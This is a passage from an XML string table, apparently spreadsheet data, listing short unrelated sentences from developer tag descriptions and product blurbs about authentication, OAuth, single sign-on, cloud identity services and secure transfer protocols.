    <t>However I noticed, when testing the iBeacon with iOS apps available in the App Store, that I could connect to the iBeacons and request their services (or at least that's what some apps intended).</t>
  </si>
  <si>
    <t>SoftLayer, an IBM Company, provides cloud infrastructure as a service from a growing number of data centers and network points of presence around the world.</t>
  </si>
  <si>
    <t>Google Advertising ID is a unique identifier that allows mobile applications running on the Android operating system (OS) to gather data about specific customers in order to improve both personalization and customer analytics.</t>
  </si>
  <si>
    <t>The contract enables third-party authorization providers to plug into J2EE application servers to make the authorization decisions when a J2EE resource is accessed.</t>
  </si>
  <si>
    <t>Multi-Tenancy as a model is used to share IT resources cost-efficiently and securely in the cloud also acheiving consistent performance.</t>
  </si>
  <si>
    <t>Authentication process made simple for users with Single Sign-On and integration with all popular platforms  Facebook, Twitter, Google, OpenID.</t>
  </si>
  <si>
    <t>Oracle Privileged Account Manager
is a secure password management solution designed to generate, provision, and manage access to passwords for privileged accounts like Linux/Unix root or Oracle database sys.</t>
  </si>
  <si>
    <t>MirageOS is a library operating system that constructs unikernels for secure, high-performance network applications across a variety of cloud computing and mobile platforms.</t>
  </si>
  <si>
    <t>Additionally, date in Data Lake Store is protected via ACL's that can be tied to an OAuth2 based identity, including those from your on-premises Active Directory.</t>
  </si>
  <si>
    <t>ADF Security
The ADF Security framework uses and extends the Oracle Platform Security Services (OPSS) architecture to simplify the securing of ADF applications and enables fine-grained access control for ADF resources such as bounded task flows.</t>
  </si>
  <si>
    <t>Ethernet is a set of networking technologies widely used to interconnect computers at the physical (layer 1) and link (layer 2) levels.</t>
  </si>
  <si>
    <t>OpenAM provides core identity services to simplify the implementation of transparent single sign-on (SSO) as a security component in a network infrastructure.</t>
  </si>
  <si>
    <t>Some payment gateways also offer an API or SDK to allow developers to integrate the payment gateway into online platforms or mobile applications.</t>
  </si>
  <si>
    <t>One can define the required gems for a Ruby application in a  and then "bundle" those gems and any sub-dependencies with the application, effectively sandboxing the app -- not just to a specific set of gems, but to a specific set of gem versions.</t>
  </si>
  <si>
    <t>ITIM provides administrators with the ability to manage user identities across the enterprise using a single administration console.</t>
  </si>
  <si>
    <t>Azure Front Door Service
Scalable and secure entry point for fast delivery of your global applications</t>
  </si>
  <si>
    <t>By "sharing", some people mean exchanging files or copying files between machines - that means you have to actually physically transfer files between the machines and either means using (old-fashioned)  or File Transfer Protocol (often with an FTP client/server like the excellent FileZilla) or the newer scp to Secure Copy files across a network, or copying to a USB memory stick and transferring them physically on foot.</t>
  </si>
  <si>
    <t>Shared key is a piece of data, known only to the parties involved, in a secure communication.</t>
  </si>
  <si>
    <t>AWS Identity and Access Management (IAM) enables you to securely control access to AWS services and resources for your users.</t>
  </si>
  <si>
    <t>It is a highly available global service that scales to hundreds of millions of identities.</t>
  </si>
  <si>
    <t>Amazon AWS Identity and Access Management (IAM) enables you to securely control access to AWS services and resources for your users.</t>
  </si>
  <si>
    <t>Basically you need to create a service account, give the service account necessary permissions(= set a role, this depends on what do you want to do with the account), download the credentials json file and set GOOGLE_APPLICATION_CREDENTIALS environment variable to point to your json file.</t>
  </si>
  <si>
    <t>A Virtual Private Cloud (VPC) is an on demand configurable pool of shared computing resources allocated within a public cloud environment, providing certain level of isolation between the different organizations (denoted as users hereafter) using the resources.</t>
  </si>
  <si>
    <t>Manage one codebase, one team, and one schedule to develop apps that give you more control, tighter security, and a better user experience.</t>
  </si>
  <si>
    <t>If the user can use their own device, the enterprise has to worry that confidential information (like employee emails and contacts) are on a device the enterprise does not control.</t>
  </si>
  <si>
    <t>Developers can design in terms of business networks, participants, identity, assets, registries, transactions, events and links, in contrast to the low level abstractions of chaincode and key-value stores.</t>
  </si>
  <si>
    <t>python-socialauth is the new port from django-social-auth to a more general solution for social authentication/authorization.</t>
  </si>
  <si>
    <t>Rest confidently knowing App Service is PCI compliant.</t>
  </si>
  <si>
    <t>Organizations 
Are group of users that share resources of an application (roles and permissions).</t>
  </si>
  <si>
    <t>The Tumbleweed Secure Transport is a commercial managed file transfer solution sold by Axway.</t>
  </si>
  <si>
    <t>MFA is a way to secure access to a resource by requiring a user to provide multiple pieces of evidence of identity.</t>
  </si>
  <si>
    <t>The UAA is a multi tenant identity management service, used in Cloud Foundry, but also available as a stand alone OAuth2 server.</t>
  </si>
  <si>
    <t>Oracle Privileged Account Manager is a secure password management solution designed to generate, provision, and manage access to passwords for privileged accounts like Linux/Unix root or Oracle database sys.</t>
  </si>
  <si>
    <t>Many platforms require consuming apps to identify themselves, so that the platform can decide which services can be provided to the app, how they should be provided, and at what rate.</t>
  </si>
  <si>
    <t>The SSO Agent helps increase user productivity with single sign-on (SSO) and enables a company to control how users access these applications with centralized access and authentication policies.</t>
  </si>
  <si>
    <t>If you want to communicate via CAN with Steering controller for example for an OEM like Delhpi .. this is not possible as the ECU (ELectronic control units) in the communication network are secured and the CAN protocol software decides who can participate and who can't.</t>
  </si>
  <si>
    <t>Currently there are six service types which are handled by pkgcloud:
Compute
Storage
Database
DNS (beta)
Block Storage (beta)
Load Balancers (beta)
Services provided by pkgcloud are exposed in two ways,
By service type
By provider name
Due to the differences between the vocabulary for each service provider, pkgcloud uses its own unified vocabulary.</t>
  </si>
  <si>
    <t>That part can be replaced roughly as described below:
Service Accounts
If your App Engine application needs to call an API to access data
  owned by the application's project, you can simplify OAuth 2.0 by
  using Service Accounts.</t>
  </si>
  <si>
    <t>Microchip performs this signature in a dedicated secure facility in
  the US, where an isolated plant will store the customers intermediate
  CA keys in a highly secure server plugged into the manufacturing line.</t>
  </si>
  <si>
    <t>SQL Server Configuration Manager is a tool to manage the services associated with SQL Server, to configure the network protocols used by SQL Server, and to manage the network connectivity configuration from SQL Server client computers.</t>
  </si>
  <si>
    <t>A FreeIPA server provides centralized authentication, authorization and account information by storing data about user, groups, hosts and other objects necessary to manage the security aspects of a network of computers.</t>
  </si>
  <si>
    <t>Kore is an easy to use web application framework for writing scalable web APIs in C. Its main goals are security, scalability and allowing rapid development and deployment of such APIs.</t>
  </si>
  <si>
    <t>Although the acronym refers to Secure Sockets Layer, the SSL protocol is deprecated and the certificates are more commonly used for Transport Layer Security (TLS) connections.</t>
  </si>
  <si>
    <t>Google Wallet is a virtual wallet that stores your payment information securely and makes paying fast both in-store and online.</t>
  </si>
  <si>
    <t>Develop robust, scalable, secure applications that integrate seamlessly into Service Oriented Architectures and can deployed as Software as a Service.</t>
  </si>
  <si>
    <t>Relying party, the party who rely on tokens issued from OpenID Connect provider, communicate with these endpoints to authorize and receive tokens.</t>
  </si>
  <si>
    <t>The Microsoft Graph gives you:
A unified API endpoint for accessing aggregated data from multiple Microsoft cloud services in a single response
Seamless navigation between entities and the relationships among them
Access to intelligence and insights coming from the Microsoft cloud
And all this using a single authentication token.</t>
  </si>
  <si>
    <t>Private cloud is the phrase used to describe a cloud computing platform that is implemented within the corporate firewall, under the control of the IT department.</t>
  </si>
  <si>
    <t>This environment offers the greatest levels of security and control, with the downside being that the organisation is responsible for the software and infrastructure thus reducing the cost savings.</t>
  </si>
  <si>
    <t>Goals Overview
Apache Ranger has the following goals:
Centralized security administration to manage all security related tasks in a central UI or using REST APIs.</t>
  </si>
  <si>
    <t>Developers can work with frameworks and languages of choice while IT can securely configure, deploy and manage developer environments that align to corporate standards and practices.</t>
  </si>
  <si>
    <t>In support of the authorization providers, there is a Role Provider which supports filtered access to resources by checks against pre-assigned roles.</t>
  </si>
  <si>
    <t>IBM Secure Gateway for Bluemix provides many key features for helping Bluemix users connect their cloud applications to on-premises resources.</t>
  </si>
  <si>
    <t>AppAuth is an SDK for native applications that facilitates interaction with OAuth2 and OpenID Connect authorization servers.</t>
  </si>
  <si>
    <t>Tunneling is a technique that enables remote access users to connect to a variety of network resources (Corporate Home Gateways or an Internet Service Provider) through a public data network.</t>
  </si>
  <si>
    <t>F-Droid is both a repository of verified free software Android apps as well as a whole app store kit, providing all the tools needed to setup and run an app store.</t>
  </si>
  <si>
    <t>Since BLE is a low energy technology it may face lot of challenges, such as data transmission rate, streaming might not be possible, security still remains an unclear subject, how would it manage broadcasting offers information on mass scale when in-store traffic is at its peak.</t>
  </si>
  <si>
    <t>A simple RS232 communication is not a reliable communication.</t>
  </si>
  <si>
    <t>A connect controller that handles the authorization flow between your Java/Spring web application, a service provider, and your users.</t>
  </si>
  <si>
    <t>Platforms
Web API
The Web API provides developers with an interface to query Spotify's extensive music catalogue through a REST interface, using OAuth 2.0 for authentication.</t>
  </si>
  <si>
    <t>Also check out Bitrix24 in the Cloud for free
Bitrix Site Manager is the industry's most secure website management solution that delivers extreme value in performance, functionality, and ease-of-use for small and medium-sized businesses.</t>
  </si>
  <si>
    <t>Particularly if the user is an organization|customer, this would provide you and the customer with the project's security boundary too.</t>
  </si>
  <si>
    <t>About authorization protocols
Another option is to use a Service Account.</t>
  </si>
  <si>
    <t>The OAuth 2.0 Playground is a tool for developers that simplifies experimentation with the OAuth 2.0 protocol and APIs.</t>
  </si>
  <si>
    <t>ACL9 is a role-based authorization gem for Rails applications.</t>
  </si>
  <si>
    <t>Square offers Rest APIs for accessing merchant account data (with their permission of course!)</t>
  </si>
  <si>
    <t>For example devices that do not hold their own IoT Hub identity but speak in different protocols, to make the conversation in a common meaning, the identity translation is required.</t>
  </si>
  <si>
    <t>In Role Based Access Control, a level of abstraction in inserted between the restricted resource and the identities permitted to use that resource.</t>
  </si>
  <si>
    <t>It uses HTTP/2 for transport, Protocol Buffers as the interface description language, and provides features such as authentication, bidirectional streaming and flow control, blocking or nonblocking bindings, and cancellation and timeouts.</t>
  </si>
  <si>
    <t>wikipedia: Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices to seamlessly discover each other's presence on the network and establish functional network services for data sharing, communications, and entertainment.</t>
  </si>
  <si>
    <t>The following options can be used to control the service:
CONTROL
You  can control the service by sending signals to the process, you can use the following commands:
Pausing service: 
Resuming service: cat &lt;lock file&gt; | xargs kill -USR2
Stopping the service: cat &lt;lock file&gt; | xargs kill
EXAMPLES
Start the MyService.exe assembly, with a lock in /root/service-lock:
mono-service -l:/root/service-lock MyService.exe
DEBUGGING
Messages produced by the service are logged on syslog.</t>
  </si>
  <si>
    <t>Authorizing a service account to access data on behalf of users in a
  domain is sometimes referred to as "delegating domain-wide authority"
  to a service account.</t>
  </si>
  <si>
    <t>The terms-of-service agreement is mainly used for legal purposes by websites and internet service providers that store a user's personal data, such as e-commerce and social networking services.</t>
  </si>
  <si>
    <t>ALPN allows the application layer to negotiate which protocol should be performed over a secure connection in a manner which avoids additional round trips and which is independent of the application layer protocols.</t>
  </si>
  <si>
    <t>Getting Started with Mobile Quality Assurance
Useful Resources:
Bluemix Mobile Services Boilerplate
Creating Mobile Applications in Bluemix
SDKs, samples, and API reference</t>
  </si>
  <si>
    <t>An extension to the commonly used File Transfer Protocol (FTP) that adds support for the Transport Layer Security (TLS) and the Secure Sockets Layer (SSL) cryptographic protocols.</t>
  </si>
  <si>
    <t>It claims that over 600 customers, including manufacturers, ecommerce sites, media sites, and U.S. intelligence services, are using its Information Access Platform product.</t>
  </si>
  <si>
    <t>OAuth (Open Authorization) is an open protocol to allow secure API authorization in a simple and standard method from desktop and web applications.</t>
  </si>
  <si>
    <t>A subscriber identity module or subscriber identification module (SIM) is an integrated circuit that securely stores the International Mobile Subscriber Identity (IMSI) and the related key used to identify and authenticate subscribers on mobile telephony devices (such as mobile phones and computers).</t>
  </si>
  <si>
    <t>The shared secret is either shared beforehand between the communicating parties, in which case it can also be called a pre-shared key, or it is created at the start of the communication session by using a key-agreement protocol, for instance using public-key cryptography such as Diffie-Hellman or using symmetric-key cryptography such as Kerberos.</t>
  </si>
  <si>
    <t>Yarn is a fast, reliable and secure package manager for Node.js and JavaScript projects, which is compatible with the npm package registry.</t>
  </si>
  <si>
    <t>The Windows Azure Access Control Service provides federated authentication using Google, Yahoo, Live Id, Facebook and other WS-Federation partners such as ADFS.</t>
  </si>
  <si>
    <t>DTR(Docker Trusted Registry) allows you to store and manage your Docker images on-premise or in your virtual private cloud to support security or regulatory compliance requirements.</t>
  </si>
  <si>
    <t>REST API Security
Secure every API endpoint with user management, SSO authentication, role-based access control, OAuth and Active Directory integration.</t>
  </si>
  <si>
    <t>Stormpath is a paid scalable cloud-based user management and authentication service with free tier (for developers).</t>
  </si>
  <si>
    <t>Wilma is used in combination with the Identity Management and Authorization PDP Generic Enablers to add authentication and authorization security to backend applications.</t>
  </si>
  <si>
    <t>The most popular and secure enterprise identity provider for Spring Security framework is Kerberos.</t>
  </si>
  <si>
    <t>(You can even
  create Stripe accounts for your users, so they only ever interact with
  your platform.)</t>
  </si>
  <si>
    <t>Sandboxing: PyPy provides the ability to run untrusted code in a
fully secure way.</t>
  </si>
  <si>
    <t>The sandbox in which Store apps operate explicitly defeats any attempt a Store app might make to use a inter-process communication mechanism.</t>
  </si>
  <si>
    <t>JOSE (Javascript Object Signing and Encryption) is a framework intended to provide a method to securely transfer claims (such as authorization information) between parties</t>
  </si>
  <si>
    <t>Azure AD B2C is a cloud identity management solution for web and mobile applications targeting your customers (consumers and businesses).</t>
  </si>
  <si>
    <t>GnuTLS is a secure communications library implementing the SSL, TLS and DTLS protocols and technologies around them.</t>
  </si>
  <si>
    <t>The Authority gem provides an ORM-neutral authorization layer for Rails and other Ruby applications.</t>
  </si>
  <si>
    <t>Rather, it relies on an encryption protocol that it passes within the tunnel to provide privacy.</t>
  </si>
  <si>
    <t>Amazon Cognito is a simple user identity and data synchronization service that helps securely manage and synchronize mobile app data.</t>
  </si>
  <si>
    <t>User Account and Authentication (UAA) is a web service provided by Cloud Foundry to manage users and OAuth2 clients.</t>
  </si>
  <si>
    <t>GOAL
The main goal of  is ensuring the most reliable realtime communication.</t>
  </si>
  <si>
    <t>Key features and capabilities:
Authentication - You can use Google, Facebook, or both as identity providers to provide a single-sign on experience for your users.</t>
  </si>
  <si>
    <t>This solution allows users to log in or share content using an identity provider.</t>
  </si>
  <si>
    <t>All im managing to get as a response is "Credential should be scoped to correct service"
I can see that the Authorization header for the call contains
"Credential = ---/---/eu-west-1/appsync/aws4_request"
When i call GET "deviceShadow" it as REST in my application today (which works)  the same values are 
"Credential = ---/---/eu-west-1/iotdata/aws4_request"
So it seams like appsync is being set as  the service and that is messing up the call?</t>
  </si>
  <si>
    <t>At late manufacture, the same registration process and secure installation of the private key occurs, it's just done outside of the manufacture facility by the person contracting to manufacture the device.</t>
  </si>
  <si>
    <t>OAuth.io is a hosted version of oauthd, the open source OAuth daemon and provides an easy and simple web interface for developers to configure and consume their various OAuth providers in a unified way.</t>
  </si>
  <si>
    <t>PingAccess is a centralized point of security and access control for Web applications and APIs, serving applications and other resources to clients outside an organization while still protecting internal interfaces from unauthorized access.</t>
  </si>
  <si>
    <t>Azure Government
Microsoft Azure Government delivers a cloud platform built upon the foundational principles of security, privacy and control, compliance, and transparency.</t>
  </si>
  <si>
    <t>They are often used to describe the
public processes of different business partners, in contrast to service orchestrations which describe the executable private process of each single partner.</t>
  </si>
  <si>
    <t>Links
Gravity homepage
Github
Features
Smart Proxy (Load Balancing...)  
Access Control (Identity and authorizations, Rate limiting, Quotas)  
Analytics
Alerting</t>
  </si>
  <si>
    <t>Registration-free COM interop is a Microsoft technology that activates COM components without using the Windows registry to store COM registration information.</t>
  </si>
  <si>
    <t>NetSqlAzMan is the .NET Sql Authorization Manager short form and is an applicative authorization manager, that is, given an application user, what this user is authorized to do within that application.</t>
  </si>
  <si>
    <t>Many features on OS X 10.7 OSX Lion were implemented first in iOS, including application sandboxing, an OS X App Store (and the implied widespread third-party app code signing), the content-centric ("natural") scrolling direction, along with AV Foundation, Core Location, and a few other frameworks.</t>
  </si>
  <si>
    <t>API Manager leverages proven, production-ready integration, security, and governance components from the WSO2 Enterprise Service Bus, WSO2 Identity Server, and WSO2 Governance Registry.</t>
  </si>
  <si>
    <t>PingFederate from Ping Identity is cloud identity management software for Single Sign-On, secure mobile access, automated user provisioning and API security.</t>
  </si>
  <si>
    <t>A managed object ID uniquely identifies the same managed object both between managed object contexts in a single application, and in multiple applications (as in distributed systems).</t>
  </si>
  <si>
    <t>A scalable cloud-based API, Stormpath provides a common role-based access control &amp; authentication framework that can be used across disparate applications and multiple programming languages.</t>
  </si>
  <si>
    <t>Q&amp;A and discussion posts around F5's BIG-IP's security and application delivery controller solutions.</t>
  </si>
  <si>
    <t>Role-Based Access Control (RBAC) provides a simple yet powerful centralized access control.</t>
  </si>
  <si>
    <t>The IMA support should be enabled through the layer meta-secure-core/meta-integrity and adding DISTRO_FEATURE "ima", aswell as IMAGE_INSTALL_append "packagegroup-ima" for the tools.</t>
  </si>
  <si>
    <t>Secure Transport is Apple's name for their implementation of Secure Sockets Layer (SSL) and Transport Layer Security (TLS).</t>
  </si>
  <si>
    <t>The IETF of the Internet Draft states that even though this protocol is described in the context of the SSH-2 protocol, it could be used in a number of different applications, such as secure file transfer over Transport Layer Security (TLS) and transfer of management information in VPN applications.</t>
  </si>
  <si>
    <t>You can test the next code:
More info: https://developers.google.com/identity/protocols/OAuth2ServiceAccount#authorizingrequests</t>
  </si>
  <si>
    <t>phpMyID is a standalone, single user, OpenID Identity Provider longer being developed or maintained.</t>
  </si>
  <si>
    <t>Account linking is referred to an ability (and a process) to connect the identity of the user with a user account in a different system.</t>
  </si>
  <si>
    <t>AWeber's API is a REST and OAuth 1.0 based API that allows developers to construct their own applications for displaying and managing AWeber customer accounts.</t>
  </si>
  <si>
    <t>FTPS should not be confused with the SSH File Transfer Protocol (SFTP), an incompatible secure file transfer subsystem for the Secure Shell (SSH) protocol.</t>
  </si>
  <si>
    <t>This solution allows users to log in to websites using social or traditional login, storing the user data for the customer.</t>
  </si>
  <si>
    <t>Federate Is now known as Single Sign-On, and is a solution that allows social login or registration for an umbrella of related websites.</t>
  </si>
  <si>
    <t>The Firebase Registration ID is supposed to be different for every client app instance (not shared across apps or devices).</t>
  </si>
  <si>
    <t>Service offered by Windows Azure that provides authentication and authorization for web applications and services</t>
  </si>
  <si>
    <t>An ACAccount object encapsulates information about a user account stored in the Accounts database.</t>
  </si>
  <si>
    <t>Integrated Single Sign On (SSO) and Identity Manager (IDM) for browser apps and RESTful web services.</t>
  </si>
  <si>
    <t>Secure Sockets Layer (SSL) is a cryptographic protocol that provides secure communications over the Internet.</t>
  </si>
  <si>
    <t>Simple JWT provides a JSON Web Token authentication backend for the Django REST Framework.</t>
  </si>
  <si>
    <t>The declarative authorization plugin offers an authorization mechanism for Ruby inspired by RBAC.</t>
  </si>
  <si>
    <t>By requesting social scopes through Google Sign In, your app can provide a social experience for your users through the use of the Google+ Profile and Social Graph APIs.</t>
  </si>
  <si>
    <t>it provides a means for managing authorization initialization and confirmation requests from identity providers.</t>
  </si>
  <si>
    <t>OAuth provides client applications a 'secure delegated access' to server resources on behalf of a resource owner.</t>
  </si>
  <si>
    <t>Another service that BigTable makes heavy use of is Chubby, a highly-available, reliable distributed lock service.</t>
  </si>
  <si>
    <t>Permission are employed in several systems, such as file systems, DBMS, apps (iOS, Android, Windows Store, ...) and claims-based identity.</t>
  </si>
  <si>
    <t>AWeber's API is a REST-based API that allows developers to construct their own applications for displaying and managing AWeber customer accounts.</t>
  </si>
  <si>
    <t>', uri='https://developer.github.com/apps/managing-oauth-apps/troubleshooting-oauth-app-access-token-request-errors/#bad-verification-code', state='null', scope='null', redirectUri='null', responseStatus=0, parameters={}}</t>
  </si>
  <si>
    <t>It provides a simple C language application programming interface (API) to access the secure communications protocols as well as APIs to parse and write X.509, PKCS #12, OpenPGP and other required structures.</t>
  </si>
  <si>
    <t>Java security technology is set of libraries, tools, and implementations of commonly used security algorithms, mechanisms, and protocols including cryptography, public key infrastructure, secure communication, authentication, and access control</t>
  </si>
  <si>
    <t>A Security Token Service is a software based identity provider responsible for issuing security tokens, especially software tokens, as part of a claims-based identity system.</t>
  </si>
  <si>
    <t>Security Assertion Markup Language (SAML) is an XML-based open standard for exchanging authentication and authorization data between security domains, that is, between an identity provider (a producer of assertions) and a service provider (a consumer of assertions).</t>
  </si>
  <si>
    <t>Security Assertion Markup Language (saml) is an xml-based open standard for exchanging authentication and authorization data between security domains, that is, between an identity provider (a producer of assertions) and a service provider (a consumer of assertions).</t>
  </si>
  <si>
    <t>Provides access to a centralized registry of the user's online accounts.</t>
  </si>
  <si>
    <t>The client interacts with the remote file system via the SSH File Transfer Protocol (SFTP), a network protocol providing file access, file transfer, and file management functionality over any reliable data stream that was designed as an extension of the Secure Shell protocol (SSH) version 2.0.</t>
  </si>
  <si>
    <t>Additionally, the SDK provides libraries for key enterprise requirements, such as authentication and secure offline storage, effectively providing an enterprise-ready mobile application container.</t>
  </si>
  <si>
    <t>As PayPals interface for handling purchase confirmation and server-to-server communications, IPN can also be used to manage and customize a variety of APIs and communications, including:
Customize your website's response to customer purchases in seconds
Track customers via IPN "pass-through" variables
Notify sellers who deal mostly in software downloads and other digital, online goods
Track affiliate sales and commissions
Store transaction information in your own database
For more about IPN: 
Technical Overview (link to new html version of docs on developer central)
Instant Payment Notification Guide (PDF)
Code Samples</t>
  </si>
  <si>
    <t>C# SDK provides a convenient abstraction of BitPay's cryptographically-secure API and allows payment gateway developers to focus on payment flow/e-commerce integration rather than on the specific details of client-server interaction using the API.</t>
  </si>
  <si>
    <t>WSO2 Enterprise Store is backed by award winning WSO2 Carbon middleware stack, which provides, enterprise grade identity management and stability.</t>
  </si>
  <si>
    <t>The Spring Security framework can authenticate with any social or enterprise identity provider.</t>
  </si>
  <si>
    <t>You can see a list of all the accounts you've authorized by typing the command:
t accounts
The output of which will be structured like this:
sferik
  UDfNTpOz5ZDG4a6w7dIWj
  uuP7Xbl2mEfGMiDu1uIyFN
gem
  thG9EfWoADtIr6NjbL9ON (active)
Note: One of your authorized accounts (specifically, the last one
authorized) will be set as active.</t>
  </si>
  <si>
    <t>legal contracts between two parties by signing which the parties agree not to disclose some confidential information to third parties.</t>
  </si>
  <si>
    <t>Requests passing through WebSEAL are evaluated by the Tivoli Access Manager authorization service to determine whether the user is authorized to access the requested resource.</t>
  </si>
  <si>
    <t>It provides a powerful and secure way to expose application functionality and data from your existing enterprise solutions and take advantage of it from the cloud.</t>
  </si>
  <si>
    <t>In cryptography, a shared secret or shared key is a piece of data, known only to the parties involved, in a secure communication.</t>
  </si>
  <si>
    <t>Docker Desktop Enterprise is a new commercial desktop offering that is the easiest, fastest and most secure way to deliver production-ready containerized applications.</t>
  </si>
  <si>
    <t>Service Location Protocol (SLP) is an Internet Engineering Task Force (IETF) standards track protocol that provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.</t>
  </si>
  <si>
    <t>Apple will reject apps that use non-public APIs, but they can be distributed using ad-hoc or enterprise distribution (on jailed and jailbroken devices), or through jailbreaks.</t>
  </si>
  <si>
    <t>The Secure File Transfer Protocol (SFTP) is a network protocol which allows you to transfer files between two computers on the Internet over any reliable stream.</t>
  </si>
  <si>
    <t>JOSSO is a Java EE, open source, single sign-on solution capable of providing user authentication and authorization for web applications.</t>
  </si>
  <si>
    <t>Logically, MAC addresses are used in the Media Access Control protocol sub-layer of the OSI reference model.</t>
  </si>
  <si>
    <t>While intrusive containers were and are widely used in C, they became more and more forgotten in C++ due to the presence of the standard containers which don't support intrusive techniques.</t>
  </si>
  <si>
    <t>Find the data your app needs from data providers like: Dun &amp; Bradstreet (business insights), Loqate (Worldwide address verification and cleansing service), StrikeIron (Phone number verification service; Sales and use tax rates lookup service), and more.</t>
  </si>
  <si>
    <t>Internet Information Services (IIS) 8.5 in Windows Server 2012 R2 provides a secure, easy-to-manage, modular and extensible platform for reliably hosting websites, services and applications.</t>
  </si>
  <si>
    <t>gem 'sdoc', '~&gt; 0.4.0',          group: :doc
# Use ActiveModel has_secure_password
# gem 'bcrypt', '~&gt; 3.1.7'
# Use unicorn as the app server
# gem 'unicorn'
# Use Capistrano for deployment
# gem 'capistrano-rails', group: :development
# Use debugger
# gem 'debugger', group: [:development, :test]
# Windows does not include zoneinfo files, so bundle the tzinfo-data gem
gem 'tzinfo-data', platforms: [:mingw, :mswin]</t>
  </si>
  <si>
    <t>Braintree provides an API for accepting payments online and through mobile apps with a single integration.</t>
  </si>
  <si>
    <t>These are Developer kits that allow easy integration of personal and social data into mobile Apps.</t>
  </si>
  <si>
    <t>MobileIron enables you to get mobile access to your corporate email, apps, and content in an easy and secure way.</t>
  </si>
  <si>
    <t>SimpleSAMLphp is an award-winning application written in native PHP that provides authentication and authorization infrastructure focused on the Security Assertion Markup Language (SAML).</t>
  </si>
  <si>
    <t>A form of single sign-on using existing login information from a social networking service such as Facebook, Twitter or Google+ to sign into a third party website.</t>
  </si>
  <si>
    <t>The Google Identity Platform consists of identity tools from Google to help you quickly build an authentication system for reducing the friction of getting users into your app.</t>
  </si>
  <si>
    <t>iOS Share Sheets,  allow a user to share important information directly with third party applications and services.</t>
  </si>
  <si>
    <t>This tag is for questions about Google Cloud KMS, a Google Cloud Platform service which allows developers to store and make use of encryption keys to secure data.</t>
  </si>
  <si>
    <t>AWS Systems Manager Parameter Store provides secure, hierarchical storage for configuration data management and secrets management.</t>
  </si>
  <si>
    <t>Azure App Configuration is a managed service that helps developers centralize their application and feature settings simply and securely.</t>
  </si>
  <si>
    <t>Rust is a language designed for writing highly reliable and fast software in a simple way.</t>
  </si>
  <si>
    <t>Google Native Client (NaCl) is a sandboxing technology for running a subset of Intel x86 or ARM native code using software-based fault isolation.</t>
  </si>
  <si>
    <t>Started in 2007, its biggest known services are Mollom, a spam fighting service, and Acquia Cloud, a platform-as-a-service for Drupal sites.</t>
  </si>
  <si>
    <t>It was developed by Visa with the intention of improving the security of Internet payments and offered to customers as the Verified by Visa service.</t>
  </si>
  <si>
    <t>Basic free accounts can still be obtained through a 3rd party reseller, D-Link, who provides DynDNS's service at no cost.</t>
  </si>
  <si>
    <t>Security Framework is an iOS and OS X API, which provides Authorization Services; Certificate, Key, and Trust Services; Cryptographic Message Syntax (CMS) Services; and Keychain Services.</t>
  </si>
  <si>
    <t>The API enables Smartsheet customers to programmatically access and manage their data, and empowers application developers to build solutions on top of Smartsheet.</t>
  </si>
  <si>
    <t>SQLBase is a highly secure database offering powerful encryption for your valuable data and data communication.</t>
  </si>
  <si>
    <t>Nette offers an easy to use service container, allowing to register singleton or factory created services.</t>
  </si>
  <si>
    <t>If security is an issue, additional protocols or technologies will have to be layered on top of MLLP to achieve these goals.</t>
  </si>
  <si>
    <t>AppAuth follows the current best practice for federated authentication and authorization in native apps.</t>
  </si>
  <si>
    <t>It specifies a process for resource owners to authorize third-party access to their server resources without sharing their credentials.</t>
  </si>
  <si>
    <t>The efficiency and performance gains from using a single, shared kernel also mean that container escape is possible with a single vulnerability.</t>
  </si>
  <si>
    <t>To prevent system resources and applications' privileged resources from unprivileged accesses, Android provides a permission-based access control mechanism.</t>
  </si>
  <si>
    <t>Flexible SDKs on top of reliable Google infrastructure
Optional, out-of-the-box authentication UI optimized to give your users the best experience
Advanced functionality like email verification, anonymous accounts, and account linking
Related tags
firebase
firebase-database
firebase-security
firebase-storage
firebase-authentication</t>
  </si>
  <si>
    <t>Questions that are about:
the Service Discovery aspects for both providers and consumers by using the HTTP or DNS capabilities
the Health Checking functionality clients can provide
the leverage of the hierarchical Key/Value Store and it's HTTP API
the RPC Protocol used to control a Consul agent programmatically
can have this tag.</t>
  </si>
  <si>
    <t>It combines the services of Crashlytics, MoPub, Twitter and others to help you build more stable apps, generate revenue through the worlds largest mobile ad exchange and enable you to tap into Twitters sign-in systems and rich streams of real-time content for greater distribution and simpler identity.</t>
  </si>
  <si>
    <t>Use Authentication Manager to manage security tokens, users, multiple applications, agents, and resources across physical sites, and to help secure access to network and web-accessible applications, such as SSL-VPNs and web portals.</t>
  </si>
  <si>
    <t>Cloud Identity and Access Management (Cloud IAM) enables you to create and manage permissions for Google Cloud Platform resources.</t>
  </si>
  <si>
    <t>Duplicati is a backup client that securely stores encrypted, incremental, compressed backups on cloud storage services and remote file servers.</t>
  </si>
  <si>
    <t>These run as autonomous proxy processes on a managed node, and perform execution and monitoring tasks for Oracle Enterprise Manager, communicating using the Hypertext Transfer Protocol (HTTP or HTTPS).</t>
  </si>
  <si>
    <t>Features:
Native port of Snap7 core in C#, no DLL to deploy
Fully managed safe code in a single source file
Virtually every hardware with an Ethernet adapter able to run a .NET Core can be connected to an S7 PLC.</t>
  </si>
  <si>
    <t>It is also different from Secure FTP, the practice of tunneling FTP through an SSH connection.</t>
  </si>
  <si>
    <t>This question concerns non-standart controls, developed by third party developer or company.</t>
  </si>
  <si>
    <t>The Java security APIs  includes cryptography, public key infrastructure, secure communication, authentication, and access control.</t>
  </si>
  <si>
    <t>It looks like when executing the command manually you have to put the password in between simple and double quotes, (e.g: '"ActualPassword"') but when using rt.exec() absolutely no simple quotes should be used and you should, actually, write down the double quotes.</t>
  </si>
  <si>
    <t>This officially signed appx package can then be updated via the app store (in contrast to the self-signed package that you can deploy via visual studio or device dashboard;; which runs fine but can NOT be updated via the microsoft app store).</t>
  </si>
  <si>
    <t>Features include:
 - Revenue Optimization
 -  Private Exchange
 -  CheckPoint
 -  Ad Serving
 -  Real-Time Analytics
 -  Multi-Platform Delivery
 -  Infrastructure  
Company site</t>
  </si>
  <si>
    <t>ActiveReports Server is a web-based ad hoc report designer with built-in, secure, scalable storage and distribution capabilities that allow companies to rapidly deploy self-service reporting to a large number of users more effectively than traditional reporting tools.</t>
  </si>
  <si>
    <t>Alternative
There are several options available that render cryptographic functions, based upon which one could lay out and implement a simple secure communication protocol that communicates with an intermediary device, which in turn facilitates Rapid Application Development and SSL.</t>
  </si>
  <si>
